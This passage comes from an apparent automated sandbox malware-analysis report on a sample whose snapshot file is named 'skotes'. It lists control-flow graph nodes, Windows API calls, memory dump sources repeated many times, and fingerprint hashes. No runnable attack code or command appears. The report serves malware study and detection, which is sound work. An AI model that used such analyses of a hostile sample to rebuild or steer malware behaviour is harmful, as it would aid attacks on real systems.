call 61d663 1593->1595 1596 607fde-607fec 1593->1596 1595->1592 1596->1539 1596->1595 1597->1543 1601 6082ce 1597->1601 1598->1597 1601->1552
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00607ED3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                            • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                                                                            • API String ID: 1721193555-3123340372
                                                                                                                                                                                            • Opcode ID: 0dc79fe0bd6e03a716f2fef8c15277ee9ace8b3a87e7a393a1f3e8e550355b25
                                                                                                                                                                                            • Instruction ID: 41c8c066dd93f1e81104a62a3efbcf0c4fca34800f88d21755f397d803668400
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0dc79fe0bd6e03a716f2fef8c15277ee9ace8b3a87e7a393a1f3e8e550355b25
                                                                                                                                                                                            • Instruction Fuzzy Hash: 81E1F670E406449BDB58FB68CC1B39F7A73AB82720F94429CE4156B3C2DB754E918BC6

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1652 641abc-641aec call 64180a 1655 641b07-641b13 call 63bf3a 1652->1655 1656 641aee-641af9 call 6375e3 1652->1656 1662 641b15-641b2a call 6375e3 call 6375f6 1655->1662 1663 641b2c-641b75 call 641775 1655->1663 1661 641afb-641b02 call 6375f6 1656->1661 1672 641de1-641de5 1661->1672 1662->1661 1670 641b77-641b80 1663->1670 1671 641be2-641beb GetFileType 1663->1671 1674 641bb7-641bdd call 6375c0 1670->1674 1675 641b82-641b86 1670->1675 1676 641c34-641c37 1671->1676 1677 641bed-641c1e call 6375c0 1671->1677 1674->1661 1675->1674 1679 641b88-641bb5 call 641775 1675->1679 1680 641c40-641c46 1676->1680 1681 641c39-641c3e 1676->1681 1677->1661 1700 641c24-641c2f call 6375f6 1677->1700 1679->1671 1679->1674 1684 641c4a-641c98 call 63be85 1680->1684 1685 641c48 1680->1685 1681->1684 1694 641cb7-641cdf call 641522 1684->1694 1695 641c9a-641ca6 call 641984 1684->1695 1685->1684 1704 641ce4-641d25 1694->1704 1705 641ce1-641ce2 1694->1705 1695->1694 1702 641ca8 1695->1702 1700->1661 1706 641caa-641cb2 call 63af48 1702->1706 1708 641d46-641d54 1704->1708 1709 641d27-641d2b 1704->1709 1705->1706 1706->1672 1712 641ddf 1708->1712 1713 641d5a-641d5e 1708->1713 1709->1708 1711 641d2d-641d41 1709->1711 1711->1708 1712->1672 1713->1712 1715 641d60-641d93 call 641775 1713->1715 1719 641d95-641dc1 call 6375c0 call 63c04d 1715->1719 1720 641dc7-641ddb 1715->1720 1719->1720 1720->1712
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00641775: CreateFileW.KERNEL32(00000000,00000000,?,00641B65,?,?,00000000,?,00641B65,00000000,0000000C), ref: 00641792
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00641BD7
                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00641BE3
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00641BF6
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00641D9C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __dosmaperr$File$CreateType
                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                            • API String ID: 3443242726-2852464175
                                                                                                                                                                                            • Opcode ID: 36644b8363283c65bd8ac30a5271fb7935fee6531281ddcc5bf48ad281aa2c79
                                                                                                                                                                                            • Instruction ID: 21df805b19f8f5c7c0841ae1c0d5efd55922800778ec4e4c4402497825e20c90
                                                                                                                                                                                            • Opcode Fuzzy Hash: 36644b8363283c65bd8ac30a5271fb7935fee6531281ddcc5bf48ad281aa2c79
                                                                                                                                                                                            • Instruction Fuzzy Hash: FAA11672A041498FCF199F68DD91BED3BA2AB07320F14019DE811AF391DB759D82CB95

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1878 6426f2-64271a call 642133 call 642191 1883 642720-64272c call 642139 1878->1883 1884 642842-64289e call 636c87 call 6462ee 1878->1884 1883->1884 1889 642732-64273e call 642165 1883->1889 1896 6428a0-6428a6 1884->1896 1897 6428a8-6428ab 1884->1897 1889->1884 1895 642744-642765 call 63adf5 GetTimeZoneInformation 1889->1895 1909 642820-642841 call 64212d call 642121 call 642127 1895->1909 1910 64276b-64278c 1895->1910 1899 6428ee-642900 1896->1899 1898 6428ad-6428bd call 63b04b 1897->1898 1897->1899 1914 6428c7-6428e0 call 6462ee 1898->1914 1915 6428bf 1898->1915 1901 642910 1899->1901 1902 642902-642905 1899->1902 1907 642915-64292a call 63adf5 call 61cff1 1901->1907 1908 642910 call 6426f2 1901->1908 1902->1901 1905 642907-64290e call 642517 1902->1905 1905->1907 1908->1907 1916 642796-64279d 1910->1916 1917 64278e-642793 1910->1917 1931 6428e5-6428eb call 63adf5 1914->1931 1932 6428e2-6428e3 1914->1932 1924 6428c0-6428c5 call 63adf5 1915->1924 1918 6427af-6427b1 1916->1918 1919 64279f-6427a6 1916->1919 1917->1916 1927 6427b3-6427dc call 63ef17 call 63e926 1918->1927 1919->1918 1925 6427a8-6427ad 1919->1925 1937 6428ed 1924->1937 1925->1927 1945 6427de-6427e1 1927->1945 1946 6427ea-6427ec 1927->1946 1931->1937 1932->1924 1937->1899 1945->1946 1947 6427e3-6427e8 1945->1947 1948 6427ee-64280c call 63e926 1946->1948 1947->1948 1951 64280e-642811 1948->1951 1952 64281b-64281e 1948->1952 1951->1952 1953 642813-642819 1951->1953 1952->1909 1953->1909
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00656758), ref: 0064275C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time$Xge
                                                                                                                                                                                            • API String ID: 565725191-3925688217
                                                                                                                                                                                            • Opcode ID: 92a39d9c6ee42f9b747af5b862b649bad0965197aa0ca256fe6611f9ca75fcdd
                                                                                                                                                                                            • Instruction ID: 8999eaeaccae06776517c31577f064af491f86010eb17dd9b87609fc273494d0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 92a39d9c6ee42f9b747af5b862b649bad0965197aa0ca256fe6611f9ca75fcdd
